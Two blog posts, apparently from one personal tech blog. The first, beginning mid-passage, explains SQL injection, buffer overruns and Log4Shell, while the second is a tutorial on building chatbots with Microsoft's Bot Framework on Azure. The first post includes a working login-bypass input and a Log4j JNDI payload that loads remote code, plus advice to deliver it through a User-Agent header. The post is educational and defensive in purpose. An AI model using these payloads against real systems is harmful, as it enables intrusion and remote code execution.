  • Microsoft’s web server used to just pass URLs through to the file system, so often you could just add “::$DATA” to the end of a URL and read source code.
  • Web server directory browsing was usually enabled, making it super-easy to troll around for config files, backups or other goodies.
  • SQL injection bugs (more on this later) were rampant.
  • A shocking number of servers exposed unsecured pages like /env.php and /test.php.
  • …and many more.

The arms race has spiraled higher and higher since those simple happy days. Today, truly novel technical hacks are pretty rare, but the double-threat of social engineering (phishing, etc.) and sloppy patch management (servers left running with known vulnerabilities) is as common as ever, and so the dance goes on. As I understand it, most of the successful attacks currently being executed by Anonymous against Russia (and frankly bully for that good work) are just old scripts running against poorly-maintained servers. It’s more about saturating the attack space than finding new vulnerabilities.

But per the usual, it’s the technical side that I find endlessly fascinating. And since there’s a pretty big gap between what gets reported on the news (“The Log4j security flaw could impact the entire internet”) and in the security forums (“Apache Log4j2 2.0-beta9 through 2.15.0 excluding security releases 2.12.2, 2.12.3, and 2.3.1 – JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints”), I thought it’d be fun to try to help normal humans understand what’s going on.

Most non-social hacks involve an attacker entering data into a system (using input fields, URLs, etc.) that ends up being executed as code inside that system. Once it’s inside a trusted process, code can do pretty much anything — read and write files, update the environment, make network calls, all kinds of bad stuff. There are approaches to limit the damage, but in most cases it’s Game Over.

Folks trying to hack a particular system will first try to understand the attack surface — that is, all of the ways users can provide input to the system. These can be totally legitimate channels, like a login form on a web site; or accidental ones, like administrative network ports exposed to the public network. Armed with this inventory, hackers attempt to craft data values that allow them to inject and execute code inside the process.

I’m going to dig into three versions of that pattern: SQL Injections, stack-based buffer overruns, and the current bugaboo Log4Shell. There’s a lot here and it’s definitely too long, but I was having too much fun to stop. That said, each of the sections stands alone, so if you have a favorite exploit feel free to jump around!

Note: I am providing real code for two of these; you can totally run it yourself and I hope you will. And before you freak out — nothing I am sharing is remotely novel to the Bad Guys out there. I may have lost some of my Libertarian leanings over the past few years, but I still believe that trying to protect people by hiding facts or knowledge never, ever, ever turns out well in the end. It just cedes power to the wrong side.

1. The Easy One (SQL Injection)

Most of the websites you use every day store their information in databases, or more specifically structured databases that are accessed using a language called SQL. A SQL database keeps information in “tables” which are basically just Excel worksheets — two-dimensional grids in which each row represents an item and each column represents some feature of that item. For example, most systems will have a “users” table that keeps one row for every authorized user. Something like this:

Actually nobody really stores passwords like this unless they are monumentally stupid. And real databases typically contain a bunch of tables with complex relationships between them. But neither of these are important for our purposes here, so I’ve simplified a bit.

Anyways, “SQL” is the language used to add, update and retrieve data in these tables. To retrieve data, you construct a “select” command that specifies which columns and rows you wish to see. For example, if I want to find the email addresses of all administrators in the system, I might execute a command like this:

select email from users where is_admin = true;

Now let’s imagine we’re implementing a login page for a web site. We build an HTML form that has text boxes to enter “username” and “password,” and a “submit” button that sends them to our server. The server then constructs and runs a query such as the following:

select user from users where user = 'USERNAME' and pw = 'PASSWORD'

where USERNAME and PASSWORD represent the values provided by the user. If those values match a row in the database, that row will be returned, and we can grant the user access to the system. If not, zero rows will be returned, and we should instead return a “login failed” error message.

Most websites use something very much like this to manage access. It’s a classic situation in which data (the USERNAME and PASSWORD values) are mixed with code (the rest of the SQL query). As a hacker, is it possible for us to construct data that will change the behavior of the code around it? It turns out that the answer is absolutely yes, unless the developer has taken certain precautions. Let’s see how that works.

Sql.java uses “JDBC” and a (very nice) SQL database called “MySQL” to demonstrate an injection attack. On a system that has git, maven and a JDK installed, build this code as follows:

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/hack
mvn clean package

Once built, it creates a table like the one above; you can simulate login attempts like this (using whatever values you like for the user and pass parameters at the end):

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad user2 pass2
Logged in as user: user2

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad user2 nope
Login failed.

The code that constructs the query is at line 47; a simple call to String.format() that inserts the provided username and password into a template SQL string:

String sql = String.format("select user from u where user = '%s' and pw = '%s'", user, password);

So far so good, but watch what happens if we use some slightly unusual parameters:

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad "user2' --" nope
Logged in as user: user2

Oh my. Even thought we provided an incorrect password, we were able to trick the system into logging us in as user2 (an administrator no less). To understand how this happened, you need to know that SQL commands can contain “comments.” Any characters following “--” in a line of SQL are simply ignored by the interpreter. So if you apply these new input values to the String.format() call, the result is:

select user from u where user = 'user2' -- and pw = 'nope'

Our carefully constructed data values terminate the first input string and then causes the rest of the command to be ignored as a comment. Since the command now asks for all rows where user = 'user2' without any reference to the password, the row is faithfully returned, and login is granted. Of course, a hack like this requires knowledge of the query in which the input values will be placed — but thanks to the use of common code and patterns across systems, that is rarely a significant barrier to success.

Fortunately, JDBC (like every SQL library) provides a way for us to prevent attacks like this. The alternate code at line 72 lets us breathe easy again (note we’re specifying sqlgood instead of sqlbad as the first parameter):

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlgood "user2' --" passX
Login failed.

Whew! Instead of directly inserting the values into the command, this code uses a “parameterized statement” with placeholders that enable JDBC to construct the final query. These statements “escape” input values so that special characters like the single-quote and comment markers are not erroneously interpreted as code. Some people choose to implement this escaping behavior themselves, but trust me, you don’t want to play that game and get it wrong.

SQL injection was one of the first really “accessible” vulnerabilities — easy to perform and with a big potential payoff. And despite being super-easy to mitigate, it’s still one of the most common ways bad guys get into websites. Crazy.

2. The Grand-Daddy (Buffer Overrun)

In the early 2000s it seemed like every other day somebody found a new buffer overrun bug, usually in Windows or some other Microsoft product (this list isn’t all buffer exploits, but it does give you a sense of the magnitude of the problem). Was that because the code was just bad, or because Windows had such dominant market share that it was the juiciest target? Probably a bit of both. Anyways, at least to me, buffer overrun exploits are some of the most technically interesting hacks out there.

That said, there’s a lot of really grotty code behind them, and modern operating systems make them a lot harder to execute (a good thing). So instead of building a fully-running exploit in this section, I’m going to just talk us through it.

For the type of buffer overrun we’ll dig into, it’s important to understand how a “call stack” works. Programs are built out of “functions” which are small bits of code that each do a particular thing. Functions are given space to store their stuff (local variables) and can call other functions that help them accomplish their purpose. For example, a “stringCopy” function might call a “stringLength” function to figure out how many characters need to be moved. This chain of functions is managed using a data structure called a “call stack” and some magic pointers called “registers”. The stack when function1 is running looks something like this:

The red and green bits make up the “stack frame” for the currently-running function (i.e., function1). The RBP register (in x64 systems) always points to the current stack frame. The first thing in the frame (the red part) is a pointer to the frame for the previous function (not shown) that called function1. The other stuff in the frame (the green part) is where function1’s local variables are stored.

When function1 calls out to function2, a few things happen:

  1. The address of the next instruction in function1 is pushed onto the top of the stack (blue below). This is where execution will resume in function1 after function2 completes.
  2. The current value of RBP is pushed onto the top of the stack (red above blue below).
  3. The RBP register is set to point at this new location on the stack. This “chain” from RBP to RBP lets the system quickly restore things for function1 when function2 completes.
  4. The RSP register is set to point just beyond the amount of space required for function2’s local variables. This is just housekeeping so we know where to do this dance again in case function2 also makes function calls.
  5. Execution starts at the beginning of function2.

I left out some things there, like the way parameters are passed to functions, but it’s good enough. At this point our stack looks like this:

Now, let’s assume that function2 looks something like this (in C, because buffer overruns usually happen in languages like C that have fewer guard rails):

void function2(char *input) {
    char[10] buffer;
    strcpy(buffer, input);
    /* do something with buffer */
    return;
}

If the input string is less than 10 characters (9 + a terminating null), everything is fine. But what happens if input is longer than this? The strcpy function happily copies over characters until it finds the null terminator, so it will just keep on copying past the space allocated for buffer and destroy anything beyond that in the stack — writing over the saved RBP value, over the return address, maybe even into the local variables further down:

Typically a bug like this just crashes the program, because when function2 returns to its caller, the return address it uses (again in blue, now overwritten by yellow) is now garbage and almost certainly doesn’t point at legitimate code. Back in the good old days before hackers got creative, that was the end of it. A bummer, something to fix, but not a huge deal.

But it turns out that if you know a bug like this exists, you can (carefully) construct an input string that can do very bad things indeed. Your malicious input data must have two special properties:

First, it needs to contain “shellcode” — hacker jargon for a sequence of bytes that is actually code (more specifically, opcodes for the targeted platform) that does your dirty work. Shellcode needs to be pretty small, so usually it just “bootstraps” the real hack. For example, common shellcode downloads and runs a much larger code package from a well-known network server owned by the hacker. The really tricky thing about building shellcode is that it can’t contain any null bytes, because it has to be a valid C string. Most hackers just reuse shellcode that somebody else wrote, which honestly seems less than sporting.

Second, it needs to be constructed so that the bytes that overwrite the return address (blue) point to the shellcode. When function2 completes, the system will dutifully start executing the code pointed to by this location. Doing this was traditionally feasible because the bottom of the stack always starts at a fixed, known address. It follows that whenever function2 is called in a particular context, the value of RBP should be the same as well. So theoretically you could build a fixed input string that looks like the yellow here:

p0wnd! So now we’re hackers, right? Well, not quite. First, finding that fixed address is quite complicated — I won’t go any further down that rabbit hole except to say that whoever figured out noop sleds was brilliant. But much worse for our visions of world domination, today’s operating systems pick a random starting address for the stack each time a process runs, rendering all that work to figure out the magic address useless. For that matter, C compilers now are much better about adding code to detect overruns before they can do damage anyways, so we may not even have gotten that far. But still, pretty cool.

3. The Latest One (Log4Shell)

Last mile folks, I promise — and I hope you’re still with me, because this last hack is a fun one and it’s easy to run yourself. Tons and tons and tons of apps were vulnerable to Log4Shell when it burst onto the scene just a few months ago. This is kind of sad, because it means that we’re all running some pretty old code. But I guess that’s the way the world works, and why there is still a market for COBOL and FORTRAN developers.

It all starts with “logging.” Software systems can be pretty complicated, so it’s useful to have some kind of trail that helps you see what is (or was) happening inside them. There are a few ways of doing this, but the old standby is simply logging — adding code to the system that writes out status messages along the way. This is particularly useful when you’re trying to understand systems in production — e.g., when a user calls and says “I tried to upload a file this morning and it crashed,” reviewing the log history from the time when this happened might give you some insight into what really went wrong.

This seems pretty straightforward, and in fact the JDK natively supports a pretty serviceable set of logging APIs. But of course things never stay simple:

  • Adding logs has a performance impact, so we’d like a way to turn them on or off at runtime, both in terms of the severity of the message (e.g., the difference between very verbose debugging logs and critical error information) and where it comes from (e.g., you might want to turn on logs for just outbound HTTP messages).
  • It’d be nice to control where the log data is saved — a file, a database, a service like Sumo Logic (there is a whole industry around this), whatever.
  • Logs can get pretty big so some kind of rotation or archive strategy would be helpful.
  • The native stuff is slow in some cases, and configuration is unwieldy, and so on.
  • Developers just really like writing developer tools (me too).

A bunch of libraries sprung up to address these gaps — and especially with the advent of dependency-management tools like Maven, the Apache Log4j project quickly became basically ubiquitous in Java applications. As a rule I try to avoid dependencies, but there are some good reasons to accept this one. So it’s everywhere. Like, everywhere. And because it’s used so commonly and serves so many scenarios, Log4j has grown into quite a beast — most folks use a tiny fraction of its features. And that’s kind of fine, except when it’s not.

OK. This one is pretty satisfying to run yourself. First, clone and build the hack app I described in the SQL Injection section earlier. The app includes an old Log4j version that contains the vulnerability, and lets you play with various log messages like this (I’ll explain the trustURLCodebase thing in a bit):

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log 'yo dawg'
11:35:25.029 [main] ERROR com.shutdownhook.hack.Logs - yo dawg

The app uses the default Log4j configuration that adds a timestamp and some other metadata to the message and outputs to the console. Pretty simple so far. Now, one of those features in Log4j is the ability to add specially-formatted tokens in a message that include dynamic data in the output. So for example:

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log 'user = ${env:USER}, java = ${java:version}'
11:42:31.358 [main] ERROR com.shutdownhook.hack.Logs - user = sean, java = Java version 11.0.13

The first token there looks up the environment variable “USER” and inserts the value found (sean). The second one inserts the currently-running Java version. Kind of cool. There are a bunch of different lookup types, and you can add your own too.

If you’re guessing that the source of our hack might be in a lookup, you nailed it. The “JNDI” lookup dynamically loads objects by name from a local or remote directory service. This kind of thing is common in enterprise Java applications — serialized objects are pushed across network wires and reconstituted in other processes. There are a few flavors of how a JNDI lookup can work, but this one in particular works well for our hack:

  • The JDNI lookup references an object stored in a remote LDAP directory server.
  • The entry in LDAP indicates that the object is a “javaNamingReference;” that the class and factory name is “Attack;” and that the code for these objects can be found at a particular URL.
  • Log4j downloads the code from that URL, instantiates the factory object, calls its “getObjectReference” method, and calls “toString” on the returned object.
  • Boom! Because the code can be downloaded from any URL, if an attacker can trick you into logging a message of their choosing, they can quite easily bootstrap their way into your process. Their toString method can do basically anything it wants.

This is way more impressive when you see it in action. To do that, you’ll need an LDAP server to host the poisoned directory entry. The simplest way I’ve found to do this is by downloading the UnboundID LDAP SDK for Java, which comes with a command-line tool called in-memory-directory-server. Assuming you are still in the “hack” directory where you built the code for this article, this command will put you in business:

PATH_TO_UNBOUNDID_SDK/tools/in-memory-directory-server \
    --baseDN "o=JNDIHack" --port 1234 --ldifFile attack/attack.ldif

You also need an HTTP server hosting the Attack.class binary. In order to keep things simple, I’ve posted a version up on Azure and set javaCodeBase in attack.ldif to point there. Generally though, you shouldn’t be running binaries that are sitting randomly out on the net, even when they were put there by somebody as upstanding and trustworthy as myself. If you want to avoid that, just compile Attack.java with “javac Attack.java,” put the resulting class file up on any web server you control, and update line 13 in attack.ldif to point there instead.

With the attacker-controlled LDAP and HTTP servers running, execute the hack app with an embedded JNDI lookup in the message:

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log '${jndi:ldap://127.0.0.1:1234/cn%3dAttack%2cou%3dObjects%2co%3dJNDIHack}'
12:22:25.857 [main] ERROR com.shutdownhook.hack.Logs - nothing to see here

And now the kicker:

$ ls -l /tmp/L33T*
-rw------- 1 sean sean 0 Apr  7 12:22 /tmp/L33T-15518763719698030164-shutdownhook

Dang son, now that’s a hack. Simply by logging a completely legit data string, I can force any code from anywhere on the Internet to run in your JVM. The code that returned “nothing to see here” and created a file in your /tmp directory lives right here. Remember that the code runs with full privileges to the process and can do anything it wants. And unlike shellcode, it doesn’t even have to be clever. Yikes.

One caveat: we’re definitely cheating by setting the parameter com.sun.jndi.ldap.object.trustURLCodebase to true. For a long time now (specifically since version 8u191) Java has disabled this behavior by default. So folks running new versions of Java generally weren’t vulnerable to this exact version of the exploit. Unfortunately, it still works for locally sourced classes, and hackers were able to find some commonly-available code that they could trick into bad behavior too. The best description of this that I’ve seen is in the “Exploiting JNDI injections in JDK 1.8.0_191+” section of this article.

But wait a second, there’s one more problem. In my demonstration, we chose the string that gets logged! This doesn’t seem fair either — log messages are created by the application developer, not the end user, so how did the Bad Guys cause those poisoned logs to be sent to Log4j in the first place? This brings us right back to the overarching theme: most effective hacks come from code hiding in input data, and sometimes those input channels aren’t completely obvious.

For example, when your web browser makes a request to a web server, it silently includes a “header” value named “User-Agent” that identifies the browser type and version. Even today, many website bugs are caused by incompatibilities from browser to browser, so web servers almost always log this User-Agent value for debugging purposes. But anyone can make a web request, and they can set the User-Agent field to anything they like.

Smells like disaster for the Good Guys. If we send a User-Agent header like “MyBrowser ${jndi:ldap://127.0.0.1:1234/cn%3dAttack%2cou%3dObjects%2co%3dJNDIHack}”, that string will very very likely be logged, which will kick off the exact remote class loading issue we demonstrated before. And with just a little understanding of how web servers work, you can come up with a ton of other places that will land your poisoned message into logging output. Bummer dude.

And, scene.

That’s probably enough of this for now. Two takeaways:

  1. For the love of Pete — control your dependencies, have a patching strategy and hire a white hat company to do a penetration test of your network. Don’t think you’re too small to be a target; everyone is a target.
  2. There is just something incredibly compelling about a good hack — figuring out how to make a machine do something it wasn’t designed to do is, plain and simple, good fun. And it will make you a better engineer too. Just don’t give in to the dark side.

As always, feel free to ping me if you have any trouble with the code, find a bug or just have something interesting to say — would love to hear it. Until next time!

Ground-Up with the Bot Framework

It seems I can’t write about code these days without a warmup rant. So feel free to jump directly to the next section if you like. But where’s the fun in that?

My mixed (ok negative) feelings about “quickstarts” go back all the way to the invention of “Wizards” at Microsoft in the early 1990s. They serve a worthy goal, guiding users through a complex process to deliver value quickly. But even in those earliest days, it was clear that the reality was little more than a cheap dopamine hit, mostly good for demos and maybe helping show what’s possible. The problem comes down to two (IMNSHO) fatal flaws:

First, quickstarts abandon users deep in the jungle with a great SUV but no map or driver’s license. Their whole reason to exist is to avoid annoying details and optionality, but that means that the user has no understanding of the context in which the solution was created. How do you change it? What dependencies does it require? How does it fit into your environment? Does it log somewhere? Is it secured appropriately for production? How much will it cost to run? The end result is that people constantly put hacked-up versions of “Hello World” into production and pay for it later when they have no idea what is really going on.

Second, they make developers even lazier than they naturally are anyways. Rather than start with the basics, quickstarts skip most of the hard stuff and lock in decisions that any serious user will have to make for themselves. If this was the start of the documentation, that’d be fine — but it’s usually the end. Instead of more context, the user just gets dropped unceremoniously into auto-generated references that don’t provide any useful narrative. Even worse, existence of the quickstart becomes an excuse for a sloppy underlying interface design (whether that’s an API or menus and dialogs) — e.g., why worry about the steering wheel if people take the test-drive using autopilot?

Anyways, this is really just a long-winded way to say that the Bot Framework quickstart is pretty useless, especially if you’re using Java. Let’s do better, shall we?

What is the Bot Framework?

There are a bunch of SDKs and builders out there for creating chatbots. The Microsoft Bot Framework has been around for a while (launched out of Microsoft Research in 2016) and seems to have pretty significant mindshare. Actually the real momentum really seems to be with no-code or low-code options, which makes sense given how many bots are shallow marketing plays — but I’m jumping right into the SDK here because that’s way more fun, and it’s my blog.

The framework is basically a big normalizer. Your bot presents a standardized HTTPS interface, using the Bot Framework SDK to help manage the various structures and state. The Azure Bot Service acts as a hub, translating messages in and out of various channels (Teams, Slack, SMS, etc.) and presenting them to your interface. Honestly, that’s basically the whole thing. There are additional services to support language understanding and speech-to-text and stuff like that, but it’s all additive to the basic framework.

WumpusBot and RadioBot

I introduced WumpusBot in my last post … basically a chatbot that lets you play a version the classic 1970s game Hunt the Wumpus. The game logic is adapted from a simplified version online and lives in Wumpus.java, but I won’t spend much time on that. I’ve hooked WumpusBot up to Twillio SMS, so you can give it a try by texting “play” to 706-943-3865.

The project also contains RadioBot, a second chatbot that knows how to interact with the Shutdown Radio service I’ve talked about before. This one is hooked up to Microsoft Teams and includes some slightly fancier interactions — I’ll talk about that after we get a handle on the basics.

Build Housekeeping

All this is hosted in an Azure Function App — so let’s start there. The code is on github. You’ll need git, mvn and a JDK. Build like this:

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/toolbox
mvn clean package install
cd ../radio/azure
mvn clean package

To run you’ll need two Cosmos Containers (details in Shutdown Radio on Azure, pay attention to the Managed Identity stuff) and a local.settings.json file with the keys COSMOS_ENDPOINT, COSMOS_ DATABASE, COSMOS_CONTAINER and COSMOS_CONTAINER_WUMPUS. You should then be able to run locally using “mvn azure-functions:run.”

Getting a little ahead of myself, but to deploy to Azure you’ll need to update the “functionAppName” setting in pom.xml; “mvn azure-functions:deploy” should work from there assuming you’re logged into the Azure CLI.

The Endpoint

Your bot needs to expose an HTTPS endpoint that receives JSON messages via POST. The Java SDK would really like you to use Spring Boot for this, but it 100% isn’t required. I’ve used a standard Azure Function for mine; that code lives in Functions.java. It really is this simple:

  1. Deserialize the JSON in the request body into an Activity object (line 68).
  2. Pull out the “authorization” header (careful of case-sensitivity) sent by the Bot Framework (line 71).
  3. Get an instance of your “bot” (line 52). This is the message handler and derives from ActivityHandler in WumpusBot.java.
  4. Get an instance of your “adapter.” This is basically the framework engine; we inherit ours from BotFrameworkHttpAdapter in Adapter.java.
  5. Pass all the stuff from steps 1, 2 and 3 to the processIncomingActivity method of your Adapter (line 74).
  6. Use the returned InvokeResponse object to send an HTTPS status and JSON body back down the wire.

All of which is to say, “receive some JSON, do a thing, send back some JSON.” Wrapped up in a million annoying Futures.

The Adapter

The BotAdapter acts as ringmaster for the “do a thing” part of the request, providing helpers and context for your Bot implementation.

BotFrameworkHttpAdapter is almost sufficient to use as-is; the only reason I needed to extend it was to provide a custom Configuration object. By default, the object looks for configuration information in a properties file. This isn’t a bad assumption for Java apps, but in Azure Functions it’s way easier to keep configuration in the environment (via local.settings.json during development and the “Configuration” blade in the portal for production). EnvConfiguration in Adapter.java handles this, and then is wired up to our Adapter at line 34.

The adapter uses its configuration object to fetch the information used in service-to-service authentication. When we register our Bot with the Bot Service, we get an application id and secret. The incoming authentication header (#2 above) is compared to the “MicrosoftAppId” and “MicrosoftAppSecret” values in the configuration to ensure the connection is legitimate.

Actually, EnvConfiguration is more complicated than would normally be required, because I wanted to host two distinct bots within the same Function App (WumpusBot and RadioBot). This requires a way to keep multiple AppId and AppSecret values around, but we only have one System.env() to work with. The “configSuffix” noise in my class takes care of that segmentation.

There are a few other “providers” you can attach to your adapter if needed. The most common of these is the “AuthenticationProvider” that helps manage user-level OAuth, for example if you want your bot to access a user’s personal calendar or send email on their behalf. I didn’t have any need for this, so left the defaults alone.

Once you get all this wired up, you can pretty much ignore it.

The Bot

Here’s where the fun stuff starts. The Adapter sets up a TurnContext object and passes it to the onTurn method of your Bot implementation. The default onTurn handler is really just a big switch on the ActivityType (MESSAGE, TYPING, CONVERSATION_UPDATE, etc.) that farms out calls to type-specific handlers. Your bot can override any of these to receive notifications on various events.

The onMessageActivity method is called whenever your bot receives a (duh) message. For simple text interactions, simply call turnContext.getActivity().getText() to read the incoming text, and turnContext.sendActivity(MessageFactory.text(responseString)) to send back a response.

The Bot Framework has tried to standardize on markdown formatting for text messages, but support is spotty. For example Teams and WebChat work well, but Skype and SMS just display messages as raw text. Get used to running into this a lot — normalization across channels is pretty hit or miss, so for anything complex you can expect to be writing channel-specific code. This goes for conversation semantics as well. For example from my experience so far, the onMembersAdded activity:

  • Is called in Teams right away when the bot enters a channel or a new member joins;
  • Is called in WebChat only after the bot receives an initial message from the user; and
  • Is never called for Twilio SMS conversations at all.

Managing State

Quirks aside, for a stateless bot, that’s really about all there is to it. But not all bots are stateless — some of the most useful functionality emerges from a conversation that develops over time (even ELIZA needed a little bit of memory!) To accomplish that you’ll use the significantly over-engineered “BotState” mechanism you see in use at WumpusBot.java line 57. There are three types of state:

All of these are the same except for the implementation of getStorageKey, which grovels around in the turnContext to construct an appropriate key to identify the desired scope.

The state object delegates actual storage to an implementation of a CRUD interface. The framework implements two versions, one in-memory and one using Cosmos DB. The memory one is another example of why quickstarts are awful — it’s easy, but is basically never appropriate for the real world. It’s just a shortcut to make the framework look simpler than it really is.

The Cosmos DB implementation is fine except that it authenticates using a key. I wanted to use the same Managed Identity I used elsewhere in this app already, so I implemented my own in Storage.java. I cheated a little by ignoring “ETag” support to manage versioning conflicts, but I just couldn’t make myself believe that this was going to be a problem. (Fun fact: Cosmos lets you create items with illegal id values, but then you can’t ever read or delete them without some serious hackage. That’s why safeKey exists.)

Last and very important if you’re implementing your own Storage — notice the call to enableDefaultTyping on the Jackson ObjectMapper. Without this setting, the ObjectMapper serializes to JSON without type information. This is often OK because you’re either providing the type directly or the OM can infer reasonably. But the framework’s state map is polymorphic (it holds Objects), so these mechanisms can’t do the job. Default typing stores type info in the JSON so you get back what you started with.

Once you have picked your scope and set up Storage, you can relatively easily fetch and store state objects (in my situation a WumpusState) with this pattern:

  1. Allocate a BotState object in your Bot singleton (line 39).
  2. Call getProperty in your activity handler to set up a named property (line 57).  
  3. Fetch the state using the returned StatePropertyAccessor and (ugh) wait on the Future (lines 58-60). Notice the constructor here which is used to initialize the object on first access.  
  4. Use the object normally.
  5. Push changes back to storage before exiting your handler (line 68). Change tracking is implicit, so be sure to update state in the specific object instance you got in step #3. This is why Wumpus.newGame() never reallocates a WumpusState once it’s attached.

Testing your Bot Locally

Once you have your Function App running and responding to incoming messages, you can test it out locally using the Bot Framework Emulator. The Emulator is a GUI that can run under Windows, Mac or Linux (in X). You provide your bot’s endpoint URL (e.g., http://localhost:7071/wumpus for the WumpusBot running locally with mvn azure-functions:run) and the app establishes a conversation that includes a bunch of nifty debugging information.

Connecting to the Bot Service

The emulator is nice because you can manage things completely locally. Testing with the real Bot Service gets a little more complicated, because it needs to access an Internet-accessible endpoint.

All of the docs and tutorials have you do this by running yet another random tool. ngrok is admittedly kind of cute — it basically just forwards a port from your local machine to a random url like https://92832de0.ngrok.io. The fact that it can serve up HTTPS is a nice bonus. So if you’re down for that, by all means go for it. But I was able to do most of my testing with the emulator, so by the time I wanted to see it live, I really just wanted to see it live. Deploying the function to Azure is easy and relatively quick, so I just did that and ended up with my real bot URL: https://shutdownradio.azurewebsites.net/wumpus.

The first step is to create the Bot in Azure. Search the portal for “Azure Bot” (it shows up in the Marketplace section). Give your bot a unique handle (I used “wumpus”) and pick your desired subscription and resource group (fair warning — most of all this can be covered under your free subscription plan, but you might want to poke around to be sure you know what you’re getting into). Java bots can only be “Multi Tenant” so choose that option and let the system create a new App ID.

Once creation is complete, paste your bot URL into the “Messaging Endpoint” box. Next copy  down the “Microsoft App Id” value and click “Manage” and then “Certificates & secrets.” Allocate a new client secret since you can’t see the value of the one they created for you (doh). Back in the “Configuration” section of your Function app, add these values (remember my comment about “configSuffix” at the beginning of all this):

  • MicrosoftAppId_wumpus (your app id)
  • MicrosoftAppSecret_wumpus (your app secret)
  • MicrosoftAppType_wumpus (“MultiTenant” with no space)

If you want to run RadioBot as well, repeat all of this for a new bot using the endpoint /bot and without the “_wumpus” suffixes in the configuration values.

Congratulations, you now have a bot! In the Azure portal, you can choose “Test in Web Chat” to give it a spin. It’s pretty easy to embed this chat experience into your web site as well (instructions here).

You can use the “Channels” tab to wire up your bot to additional services. I hooked Wumpus up to Twilio SMS using the instructions here. In brief:

  • Sign up for Twilio and get an SMS number.
  • Create a “TwiML” application on their portal and link it to the Bot Framework using the endpoint https://sms.botframework.com/api/sms.
  • Choose the Twilio channel in the Azure portal and paste in your TwiML application credentials.

That’s it! Just text “play” to 706-943-3865 and you’re off to the races.

Bots in Microsoft Teams

Connecting to Teams is conceptually similar to SMS, just a lot more fiddly.

First, enable the Microsoft Teams channel in your Bot Service configuration. This is pretty much just a checkbox and confirmation that this is a Commercial, not Government, bot.

Next, bop over to the Teams admin site at https://admin.teams.microsoft.com/ (if you’re not an admin you may need a hand here). Under “Teams Apps” / “Setup Policies” / “Global”, make sure that the “Upload custom apps” slider is enabled. Note if you want to be more surgical about this, you can instead add a new policy with this option just for developers and assign it to them under “Manage Users.”

Finally, head over to https://dev.teams.microsoft.com/apps and create a new custom app. There are a lot of options here, but only a few are required:

  • Under “Basic Information”, add values for the website, privacy policy and terms of use. Any URL is fine for now, but they can’t be empty, or you’ll get mysterious errors later.
  • Under “App Features”, add a “Bot.” Paste your bot’s “Microsoft App Id” (the same one you used during the function app configuration) into the “Enter a Bot ID” box. Also check whichever of the “scope” checkboxes are interesting to you (I just checked them all).

Save all this and you’re ready to give it a try. If you want a super-quick dopamine hit, just click the “Preview in Teams” button. If you want to be more official about it, choose “Publish” / “Publish to org” and then ask your Teams Admin to approve the application for use. If you’re feeling really brave, you can go all-in and publish your bot to the Teams Store for anyone to use, but that’s beyond my pay grade here. Whichever way you choose to publish, once the app is in place you can start a new chat with your bot by name, or add them to a channel by typing @ and selecting “Get Bots” in the resulting popup. Pretty cool!

A caveat about using bots in channels: your bot will only receive messages in which they are @mentioned, which can be slightly annoying but net net probably makes sense. Unfortunately though, it is probably going to mess up your message parsing, because the mention is included in the message text (e.g., “<at>botname</at> real message.”). I’ve coded RadioBot to handle this by stripping out anything between “at” markers at line 454. Just another way in which you really do need to know what channel you’re dealing with.

Teams in particular has a whole bunch of other capabilities and restrictions beyond what you’ll find in the vanilla Bot Framework. It’s worth reading through their documentation and in particular being aware of the Teams-specific stuff you’ll find in TeamsChannelData.

We made it!

Well that was a lot; kind of an anti-quickstart. But if you’ve gotten this far, you have a solid understanding of how the Bot Framework works and how the pieces fit together, start to finish. There is a bunch more we could dig into (for instance check out the Adaptive Card interfaces in RadioBot here and here) — but we don’t need to, because you’ll be able to figure it out for yourself. Teach a person to fish or whatever, I guess.

Anyhoo, if you do anything cool with this stuff, I’d sure love to hear about it, and happy to answer questions if you get stuck as well. Beyond that, I hope you’ll enjoy some good conversations with our future robot overlords, and I’ll look forward to checking in with another post soon!